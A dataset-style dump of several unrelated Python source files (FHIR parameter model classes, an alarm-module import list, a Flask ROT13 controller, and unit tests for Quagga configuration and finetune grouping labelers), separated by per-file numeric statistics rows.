        self.valueAddress = None
        """ If parameter is a data type.
        Type `Address` (represented as `dict` in JSON). """

        self.valueAttachment = None
        """ If parameter is a data type.
        Type `Attachment` (represented as `dict` in JSON). """

        self.valueBase64Binary = None
        """ If parameter is a data type.
        Type `str`. """

        self.valueBoolean = None
        """ If parameter is a data type.
        Type `bool`. """

        self.valueCode = None
        """ If parameter is a data type.
        Type `str`. """

        self.valueCodeableConcept = None
        """ If parameter is a data type.
        Type `CodeableConcept` (represented as `dict` in JSON). """

        self.valueCoding = None
        """ If parameter is a data type.
        Type `Coding` (represented as `dict` in JSON). """

        self.valueContactPoint = None
        """ If parameter is a data type.
        Type `ContactPoint` (represented as `dict` in JSON). """

        self.valueDate = None
        """ If parameter is a data type.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueDateTime = None
        """ If parameter is a data type.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueDecimal = None
        """ If parameter is a data type.
        Type `float`. """

        self.valueHumanName = None
        """ If parameter is a data type.
        Type `HumanName` (represented as `dict` in JSON). """

        self.valueIdentifier = None
        """ If parameter is a data type.
        Type `Identifier` (represented as `dict` in JSON). """

        self.valueInstant = None
        """ If parameter is a data type.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueInteger = None
        """ If parameter is a data type.
        Type `int`. """

        self.valuePeriod = None
        """ If parameter is a data type.
        Type `Period` (represented as `dict` in JSON). """

        self.valueQuantity = None
        """ If parameter is a data type.
        Type `Quantity` (represented as `dict` in JSON). """

        self.valueRange = None
        """ If parameter is a data type.
        Type `Range` (represented as `dict` in JSON). """

        self.valueRatio = None
        """ If parameter is a data type.
        Type `Ratio` (represented as `dict` in JSON). """

        self.valueReference = None
        """ If parameter is a data type.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.valueSignature = None
        """ If parameter is a data type.
        Type `Signature` (represented as `dict` in JSON). """

        self.valueString = None
        """ If parameter is a data type.
        Type `str`. """

        self.valueTime = None
        """ If parameter is a data type.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueTiming = None
        """ If parameter is a data type.
        Type `Timing` (represented as `dict` in JSON). """

        self.valueUri = None
        """ If parameter is a data type.
        Type `str`. """

        super(ParametersParameter, self).__init__(jsondict)

    def elementProperties(self):
        # Extend the base property table with ("json name", "attribute
        # name", type, is_list) tuples for every supported value type.
        js = super(ParametersParameter, self).elementProperties()
        js.extend([
            ("name", "name", str, False),
            ("part", "part", ParametersParameterPart, True),
            ("resource", "resource", resource.Resource, False),
            ("valueAddress", "valueAddress", address.Address, False),
            ("valueAttachment", "valueAttachment", attachment.Attachment, False),
            ("valueBase64Binary", "valueBase64Binary", str, False),
            ("valueBoolean", "valueBoolean", bool, False),
            ("valueCode", "valueCode", str, False),
            ("valueCodeableConcept", "valueCodeableConcept", codeableconcept.CodeableConcept, False),
            ("valueCoding", "valueCoding", coding.Coding, False),
            ("valueContactPoint", "valueContactPoint", contactpoint.ContactPoint, False),
            ("valueDate", "valueDate", fhirdate.FHIRDate, False),
            ("valueDateTime", "valueDateTime", fhirdate.FHIRDate, False),
            ("valueDecimal", "valueDecimal", float, False),
            ("valueHumanName", "valueHumanName", humanname.HumanName, False),
            ("valueIdentifier", "valueIdentifier", identifier.Identifier, False),
            ("valueInstant", "valueInstant", fhirdate.FHIRDate, False),
            ("valueInteger", "valueInteger", int, False),
            ("valuePeriod", "valuePeriod", period.Period, False),
            ("valueQuantity", "valueQuantity", quantity.Quantity, False),
            ("valueRange", "valueRange", range.Range, False),
            ("valueRatio", "valueRatio", ratio.Ratio, False),
            ("valueReference", "valueReference", fhirreference.FHIRReference, False),
            ("valueSignature", "valueSignature", signature.Signature, False),
            ("valueString", "valueString", str, False),
            ("valueTime", "valueTime", fhirdate.FHIRDate, False),
            ("valueTiming", "valueTiming", timing.Timing, False),
            ("valueUri", "valueUri", str, False),
        ])
        return js
class ParametersParameterPart(fhirelement.FHIRElement):
    """ Named part of a parameter (e.g. Tuple).

    A named part of a parameter. In many implementation context, a set of named
    parts is known as a "Tuple".

    As with `ParametersParameter`, one of the `value*` attributes (or
    `resource`) is expected to carry the part's payload.
    """

    # Canonical FHIR element name, used during (de)serialization.
    resource_name = "ParametersParameterPart"

    def __init__(self, jsondict=None):
        """ Initialize all valid properties.

        `jsondict` is an optional dict of JSON values used to populate
        the instance (handled by the base class).
        """

        self.name = None
        """ Name from the definition.
        Type `str`. """

        self.resource = None
        """ If part is a whole resource.
        Type `Resource` (represented as `dict` in JSON). """

        self.valueAddress = None
        """ Value of the part.
        Type `Address` (represented as `dict` in JSON). """

        self.valueAttachment = None
        """ Value of the part.
        Type `Attachment` (represented as `dict` in JSON). """

        self.valueBase64Binary = None
        """ Value of the part.
        Type `str`. """

        self.valueBoolean = None
        """ Value of the part.
        Type `bool`. """

        self.valueCode = None
        """ Value of the part.
        Type `str`. """

        self.valueCodeableConcept = None
        """ Value of the part.
        Type `CodeableConcept` (represented as `dict` in JSON). """

        self.valueCoding = None
        """ Value of the part.
        Type `Coding` (represented as `dict` in JSON). """

        self.valueContactPoint = None
        """ Value of the part.
        Type `ContactPoint` (represented as `dict` in JSON). """

        self.valueDate = None
        """ Value of the part.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueDateTime = None
        """ Value of the part.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueDecimal = None
        """ Value of the part.
        Type `float`. """

        self.valueHumanName = None
        """ Value of the part.
        Type `HumanName` (represented as `dict` in JSON). """

        self.valueIdentifier = None
        """ Value of the part.
        Type `Identifier` (represented as `dict` in JSON). """

        self.valueInstant = None
        """ Value of the part.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueInteger = None
        """ Value of the part.
        Type `int`. """

        self.valuePeriod = None
        """ Value of the part.
        Type `Period` (represented as `dict` in JSON). """

        self.valueQuantity = None
        """ Value of the part.
        Type `Quantity` (represented as `dict` in JSON). """

        self.valueRange = None
        """ Value of the part.
        Type `Range` (represented as `dict` in JSON). """

        self.valueRatio = None
        """ Value of the part.
        Type `Ratio` (represented as `dict` in JSON). """

        self.valueReference = None
        """ Value of the part.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.valueSignature = None
        """ Value of the part.
        Type `Signature` (represented as `dict` in JSON). """

        self.valueString = None
        """ Value of the part.
        Type `str`. """

        self.valueTime = None
        """ Value of the part.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.valueTiming = None
        """ Value of the part.
        Type `Timing` (represented as `dict` in JSON). """

        self.valueUri = None
        """ Value of the part.
        Type `str`. """

        super(ParametersParameterPart, self).__init__(jsondict)

    def elementProperties(self):
        # Extend the base property table with ("json name", "attribute
        # name", type, is_list) tuples for every supported value type.
        js = super(ParametersParameterPart, self).elementProperties()
        js.extend([
            ("name", "name", str, False),
            ("resource", "resource", resource.Resource, False),
            ("valueAddress", "valueAddress", address.Address, False),
            ("valueAttachment", "valueAttachment", attachment.Attachment, False),
            ("valueBase64Binary", "valueBase64Binary", str, False),
            ("valueBoolean", "valueBoolean", bool, False),
            ("valueCode", "valueCode", str, False),
            ("valueCodeableConcept", "valueCodeableConcept", codeableconcept.CodeableConcept, False),
            ("valueCoding", "valueCoding", coding.Coding, False),
            ("valueContactPoint", "valueContactPoint", contactpoint.ContactPoint, False),
            ("valueDate", "valueDate", fhirdate.FHIRDate, False),
            ("valueDateTime", "valueDateTime", fhirdate.FHIRDate, False),
            ("valueDecimal", "valueDecimal", float, False),
            ("valueHumanName", "valueHumanName", humanname.HumanName, False),
            ("valueIdentifier", "valueIdentifier", identifier.Identifier, False),
            ("valueInstant", "valueInstant", fhirdate.FHIRDate, False),
            ("valueInteger", "valueInteger", int, False),
            ("valuePeriod", "valuePeriod", period.Period, False),
            ("valueQuantity", "valueQuantity", quantity.Quantity, False),
            ("valueRange", "valueRange", range.Range, False),
            ("valueRatio", "valueRatio", ratio.Ratio, False),
            ("valueReference", "valueReference", fhirreference.FHIRReference, False),
            ("valueSignature", "valueSignature", signature.Signature, False),
            ("valueString", "valueString", str, False),
            ("valueTime", "valueTime", fhirdate.FHIRDate, False),
            ("valueTiming", "valueTiming", timing.Timing, False),
            ("valueUri", "valueUri", str, False),
        ])
        return js
| 36.13172
| 101
| 0.564393
| 1,276
| 13,441
| 5.923981
| 0.112853
| 0.068792
| 0.051594
| 0.080434
| 0.829475
| 0.798518
| 0.755391
| 0.752613
| 0.651012
| 0.647176
| 0
| 0.003575
| 0.313221
| 13,441
| 371
| 102
| 36.229111
| 0.815296
| 0.053567
| 0
| 0.788462
| 1
| 0
| 0.167073
| 0.002805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.108974
| 0
| 0.205128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
33e28dc1fc5108d7fd01c59c7d45edf2b1ceeca0
| 1,089
|
py
|
Python
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common.alarm.objects.v1 import ALARM_CONTEXT # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_EVENT_TYPE # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_PROBABLE_CAUSE # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_SEVERITY # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_TREND_INDICATION # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_TYPE # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmData # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmStateData # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmThresholdData # noqa: F401
from nfv_common.alarm._alarm_module import alarm_clear # noqa: F401
from nfv_common.alarm._alarm_module import alarm_finalize # noqa: F401
from nfv_common.alarm._alarm_module import alarm_initialize # noqa: F401
from nfv_common.alarm._alarm_module import alarm_raise # noqa: F401
from nfv_common.alarm._alarm_module import alarm_subsystem_sane # noqa: F401
| 51.857143
| 77
| 0.809917
| 169
| 1,089
| 4.988166
| 0.242604
| 0.116251
| 0.215896
| 0.298932
| 0.758007
| 0.758007
| 0.758007
| 0.758007
| 0.71293
| 0.615658
| 0
| 0.06341
| 0.116621
| 1,089
| 20
| 78
| 54.45
| 0.81289
| 0.218549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
1d2a580f669c070c6fc8750356da7d72424c836a
| 4,494
|
py
|
Python
|
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
from werkzeug.datastructures import ImmutableMultiDict
from flask.wrappers import Request
from flask import jsonify
from repositories import rot13_repository
from traceback import format_exc
from json import loads
import logging
def encrypt(request: Request) -> str:
    """Handle a ROT13 encryption request over GET or POST.

    GET reads ``plain_text`` from the query string; POST reads a JSON
    body with a ``plain_text`` field.  Returns a Flask JSON response
    whose payload carries ``status``, ``response`` and the HTTP
    ``method`` used.  Unexpected failures are logged and reported as
    status 500 with the traceback included.
    """
    result: dict = {}
    try:
        if request.method == 'GET':
            body: ImmutableMultiDict = request.args
            plain_text: str = body.get('plain_text', type=str)
            if not plain_text:
                result.update({
                    'status': 400,
                    'response': "Missing argument 'plain_text' on request"
                })
            else:
                rot13_encrypted_text: str = rot13_repository\
                    .Rot13.encrypt(plain_text)
                result.update({
                    'status': 200,
                    'response': {
                        'plain_text': plain_text,
                        'rot13_encrypted_text': rot13_encrypted_text
                    }
                })
        if request.method == 'POST':
            decoded_data: str = request.data.decode('utf-8')
            # Bodies may arrive wrapped in literal single quotes; strip
            # them before JSON parsing.
            if decoded_data.startswith("\'")\
                    and decoded_data.endswith("\'"):
                decoded_data = decoded_data[1:-1]
            body: dict = loads(decoded_data)
            plain_text: str = body.get('plain_text')
            if not plain_text:
                result.update({
                    'status': 400,
                    'response': "Missing argument 'plain_text' on request"
                })
            else:
                rot13_encrypted_text: str = rot13_repository\
                    .Rot13.encrypt(plain_text)
                result.update({
                    'status': 200,
                    'response': {
                        'plain_text': plain_text,
                        'rot13_encrypted_text': rot13_encrypted_text
                    }
                })
    except Exception:
        # Log the traceback and convert any unexpected failure into a 500.
        stacktrace: str = format_exc()
        logging.getLogger(__name__).error(stacktrace)
        result.update({
            'status': 500,
            'response': "Internal Server Error",
            'stacktrace': stacktrace
        })
    result.update({'method': request.method})
    return jsonify(result)
def decrypt(request: Request) -> str:
    """Decrypt 'rot13_encrypted_text' back to plain text.

    Mirrors encrypt(): the argument arrives via the query string (GET) or
    a JSON body (POST); the JSON response carries 'status', 'response' and
    'method'. Fix: the original 500 handler set the 'method' key inside
    the error payload even though it is set again unconditionally below —
    the redundant entry is removed for consistency with encrypt().
    """
    result: dict = {}
    try:
        rot13_encrypted_text = None
        handled = request.method in ('GET', 'POST')
        if request.method == 'GET':
            rot13_encrypted_text = request.args.get(
                'rot13_encrypted_text', type=str)
        elif request.method == 'POST':
            decoded_data: str = request.data.decode('utf-8')
            # Some clients wrap the JSON payload in single quotes; strip them.
            if decoded_data.startswith("'") and decoded_data.endswith("'"):
                decoded_data = decoded_data[1:-1]
            rot13_encrypted_text = loads(decoded_data)\
                .get('rot13_encrypted_text')
        if handled:
            if not rot13_encrypted_text:
                result.update({
                    'status': 400,
                    'response': "Missing argument 'rot13_encrypted_text' on request"
                })
            else:
                plain_text: str = rot13_repository\
                    .Rot13.decrypt(rot13_encrypted_text)
                result.update({
                    'status': 200,
                    'response': {
                        'plain_text': plain_text,
                        'rot13_encrypted_text': rot13_encrypted_text
                    }
                })
    except Exception:
        stacktrace: str = format_exc()
        logging.getLogger(__name__).error(stacktrace)
        result.update({
            'status': 500,
            'response': "Internal Server Error",
            'stacktrace': stacktrace
        })
    result.update({'method': request.method})
    return jsonify(result)
| 36.241935
| 84
| 0.498442
| 389
| 4,494
| 5.532134
| 0.164524
| 0.083643
| 0.167286
| 0.081784
| 0.889405
| 0.8829
| 0.8829
| 0.856877
| 0.810409
| 0.767658
| 0
| 0.035299
| 0.407432
| 4,494
| 123
| 85
| 36.536585
| 0.772813
| 0
| 0
| 0.817391
| 0
| 0
| 0.136182
| 0.009791
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0.06087
| 0
| 0.095652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d2ffb986ec6f97d076bc7651421051475ff153d
| 3,978
|
py
|
Python
|
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | 1
|
2017-07-17T18:56:22.000Z
|
2017-07-17T18:56:22.000Z
|
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT_evolvability
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | null | null | null |
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT_evolvability
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | null | null | null |
import unittest
import quagga_config_pb2
import QuaggaTopo_pb2
from generate_general_configs import CreateGeneralConfigs
from google.protobuf.text_format import Merge
class GenerateGeneralConfigsTest(unittest.TestCase):
    """Tests for CreateGeneralConfigs.

    Bug fix: both test methods were originally named
    testxCreateGeneralConfigsXOneHostXCorrectConfigDict, so the second
    definition silently shadowed the first and only one of the two ever
    ran. The two-host test now has its own name. The repeated proto
    parsing/serialization boilerplate is hoisted into helpers, the unused
    `generate_wiser_configs` local is removed, and `.iteritems()` is
    replaced with `.items()` (works on both Python 2 and 3).
    """

    @staticmethod
    def _parse_hosts(host_text_protos):
        # Parse each host text proto into a QuaggaTopo Host message.
        return [Merge(host_string, QuaggaTopo_pb2.Host())
                for host_string in host_text_protos]

    @staticmethod
    def _serialize_expected(expected_text_protos):
        # Turn {hostname: Configuration text proto} into
        # {hostname: serialized bytes} for comparison.
        serialized = {}
        for hostname, text_proto in expected_text_protos.items():
            config = quagga_config_pb2.Configuration()
            Merge(text_proto, config)
            serialized[hostname] = config.SerializeToString()
        return serialized

    def _run_and_assert(self, host_text_protos, expected_text_protos):
        # Run CreateGeneralConfigs over the parsed hosts with an empty
        # topology and assert the serialized outputs match expectations.
        host_list = self._parse_hosts(host_text_protos)
        topology = QuaggaTopo_pb2.Topology()
        Merge("", topology)
        result_configs_dict = CreateGeneralConfigs(host_list, topology)
        assert_dict = {}
        for hostname, generalprotocolconfig in result_configs_dict.items():
            assert_dict[hostname] = generalprotocolconfig.SerializeToString()
        self.assertDictEqual(
            self._serialize_expected(expected_text_protos), assert_dict)

    def testxCreateGeneralConfigsXOneHostXCorrectConfigDict(self):
        # A lone wiser host: config has no island members.
        self._run_and_assert(
            [
                """
                host_type : HT_QUAGGA
                host_name: 'a1'
                ip: '172.0.1.1'
                lo_ip: '10.0.1.1'
                as_num: 100
                island_id : 1
                protocol: 'wiser'
                """
            ],
            {
                'a1': """
                protocol_type : PT_WISER
                island_id : 1
                wiser_protocol_config {}
                """
            })

    def testxCreateGeneralConfigsXTwoHostsXCorrectConfigDict(self):
        # Two wiser hosts share island 1: each config lists the other's AS.
        self._run_and_assert(
            [
                """
                host_type : HT_QUAGGA
                host_name: 'a1'
                ip: '172.0.1.1'
                lo_ip: '10.0.1.1'
                as_num: 100
                island_id : 1
                protocol: 'wiser'
                """,
                """
                host_type : HT_QUAGGA
                host_name: 'b1'
                ip: '172.0.1.1'
                lo_ip: '10.0.1.1'
                as_num: 200
                island_id : 1
                protocol: 'wiser'
                """
            ],
            {
                'a1': """
                protocol_type : PT_WISER
                island_id : 1
                island_member_ases : 200
                wiser_protocol_config {}
                """,
                'b1': """
                protocol_type : PT_WISER
                island_id : 1
                island_member_ases : 100
                wiser_protocol_config {}
                """
            })
# Build and execute the suite immediately when this module is run (or
# imported); there is no `if __name__ == "__main__"` guard.
suite = unittest.TestLoader().loadTestsFromTestCase(GenerateGeneralConfigsTest)
runner = unittest.TextTestRunner()
runner.run(suite)
| 30.6
| 88
| 0.597536
| 358
| 3,978
| 6.357542
| 0.22067
| 0.02812
| 0.007909
| 0.02109
| 0.852373
| 0.852373
| 0.841828
| 0.841828
| 0.841828
| 0.841828
| 0
| 0.025213
| 0.322021
| 3,978
| 129
| 89
| 30.837209
| 0.818687
| 0.027149
| 0
| 0.753425
| 1
| 0
| 0.128237
| 0.019657
| 0
| 0
| 0
| 0
| 0.082192
| 1
| 0.027397
| false
| 0
| 0.068493
| 0
| 0.109589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1d335db1c69a203488652a93ed672117702b140b
| 171
|
py
|
Python
|
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | null | null | null |
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | null | null | null |
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | 1
|
2021-12-10T22:36:34.000Z
|
2021-12-10T22:36:34.000Z
|
import pytest
from pipet.core.shop_conn.wc import *
from pipet.core.transform.model_to_wc import *
from pipet.core.transform.wc_to_model import *
from pprint import pprint
| 34.2
| 46
| 0.830409
| 29
| 171
| 4.724138
| 0.413793
| 0.19708
| 0.284672
| 0.248175
| 0.437956
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099415
| 171
| 5
| 47
| 34.2
| 0.88961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1d4320ecfcfc3020f43bd0ae992463784c68c2e0
| 15,573
|
py
|
Python
|
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
import os
import unittest
import logging
from copy import copy
from pathlib import Path
import codecs
import json
import random
import time
# required for tensorflow logging control
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import pytest
from pytest import approx
import tensorflow as tf
import numpy as np
from finetune.base_models.huggingface.models import HFT5
from finetune.target_models.grouping import (
GroupSequenceLabeler,
PipelineSequenceLabeler,
MultiCRFGroupSequenceLabeler,
MultiLogitGroupSequenceLabeler,
BROSLabeler,
JointBROSLabeler,
GroupRelationLabeler,
JointGroupRelationLabeler,
SequenceS2S,
GroupS2S,
JointS2S,
)
class TestGroupingLabelers(unittest.TestCase):
    """Exercises every grouping/sequence-labeling model head against one
    tiny synthetic document of five percentage phrases.

    Refactor: every test previously repeated the identical text/labels/
    groups fixtures and fit/predict/assert boilerplate verbatim. Those are
    hoisted into class-level helpers so each test states only its model
    configuration and which outputs it checks; behavior is unchanged.
    """

    # Shared synthetic document used by all tests.
    TEXT = ("five percent (5%) \n " +
            "fifty percent (50%) \n " +
            "two percent (2%) \n " +
            "nine percent (9%) \n " +
            "three percent (3%) \n ")

    @staticmethod
    def _labels():
        # Fresh per-span sequence labels for TEXT (copied per call so tests
        # that delete prediction keys cannot cross-contaminate).
        return [
            {'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
            {'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
            {'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
            {'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
            {'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
        ]

    @staticmethod
    def _groups():
        # Fresh group annotations: two unlabeled multi-span groups.
        return [
            {"spans": [
                {'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
            ], 'label': None},
            {"spans": [
                {'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
            ], 'label': None}
        ]

    def _fit_predict(self, model, labels):
        # Fit on 30 copies of (TEXT, labels) and return predictions for TEXT.
        model.fit([self.TEXT] * 30, [labels] * 30)
        return model.predict([self.TEXT])[0]

    def _assert_joint(self, preds, expected):
        # Check joint (sequence, group) predictions, ignoring the per-span
        # confidence scores the models attach.
        self.assertEqual(len(preds), 2)
        self.assertEqual(len(preds[0]), 5)
        self.assertEqual(len(preds[1]), 2)
        for span in preds[0]:
            del span["confidence"]
        self.assertEqual(preds, expected)

    def test_nested_tagging(self):
        model = GroupSequenceLabeler(class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self._assert_joint(preds, expected)

    def test_multi_crf_tagging(self):
        model = MultiCRFGroupSequenceLabeler(crf_sequence_labeling=True,
                                             class_weights="sqrt",
                                             lr=5e-5)
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self._assert_joint(preds, expected)

    def test_multi_logit_tagging(self):
        model = MultiLogitGroupSequenceLabeler(crf_sequence_labeling=True,
                                               class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self._assert_joint(preds, expected)

    def test_pipeline_tagging(self):
        # Pipeline model predicts only the group structure.
        model = PipelineSequenceLabeler(class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self.assertEqual(len(preds), 2)
        self.assertEqual(preds, expected[1])

    def test_bros_tagging(self):
        # BROS head also predicts only groups.
        model = BROSLabeler(lr=8e-5, class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self.assertEqual(len(preds), 2)
        self.assertEqual(preds, expected[1])

    def test_joint_bros_tagging(self):
        model = JointBROSLabeler(lr=8e-5, n_epochs=16, class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self._assert_joint(preds, expected)

    def test_group_relation_tagging(self):
        model = GroupRelationLabeler(lr=8e-5, class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self.assertEqual(len(preds), 2)
        self.assertEqual(preds, expected[1])

    def test_joint_group_relation_tagging(self):
        model = JointGroupRelationLabeler(lr=8e-5,
                                          group_loss_weight=600,
                                          class_weights="sqrt")
        expected = (self._labels(), self._groups())
        preds = self._fit_predict(model, expected)
        self._assert_joint(preds, expected)

    def test_t5_sequence_tagging(self):
        # S2S sequence model is trained on labels only (no groups).
        model = SequenceS2S(base_model=HFT5, n_epochs=8)
        labels = self._labels()
        preds = self._fit_predict(model, labels)
        self.assertEqual(len(preds), 5)
        self.assertEqual(preds, labels)

    def test_t5_group_tagging(self):
        model = GroupS2S(base_model=HFT5, n_epochs=8)
        groups = self._groups()
        preds = self._fit_predict(model, (self._labels(), groups))
        self.assertEqual(len(preds), 2)
        self.assertEqual(preds, groups)

    def test_t5_joint_tagging(self):
        model = JointS2S(base_model=HFT5, n_epochs=16)
        labels = self._labels()
        groups = self._groups()
        label_preds, group_preds = self._fit_predict(model, (labels, groups))
        self.assertEqual(len(label_preds), 5)
        self.assertEqual(labels, label_preds)
        self.assertEqual(len(group_preds), 2)
        self.assertEqual(groups, group_preds)
| 41.862903
| 92
| 0.454697
| 1,709
| 15,573
| 4.10474
| 0.070802
| 0.072701
| 0.047042
| 0.072986
| 0.833785
| 0.822666
| 0.822666
| 0.802566
| 0.796864
| 0.796864
| 0
| 0.057469
| 0.341874
| 15,573
| 371
| 93
| 41.975741
| 0.626988
| 0.002504
| 0
| 0.755814
| 0
| 0
| 0.286956
| 0
| 0
| 0
| 0
| 0
| 0.098837
| 1
| 0.031977
| false
| 0
| 0.043605
| 0
| 0.078488
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d57d1c6fe271dc7a947602662334a6fe9a625de
| 127
|
py
|
Python
|
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
from elf.types.base.struct.elf_struct_property import ElfStructProperty
from elf.types.base.struct.elf_struct import ElfStruct
| 42.333333
| 71
| 0.874016
| 19
| 127
| 5.684211
| 0.473684
| 0.12963
| 0.222222
| 0.296296
| 0.574074
| 0.574074
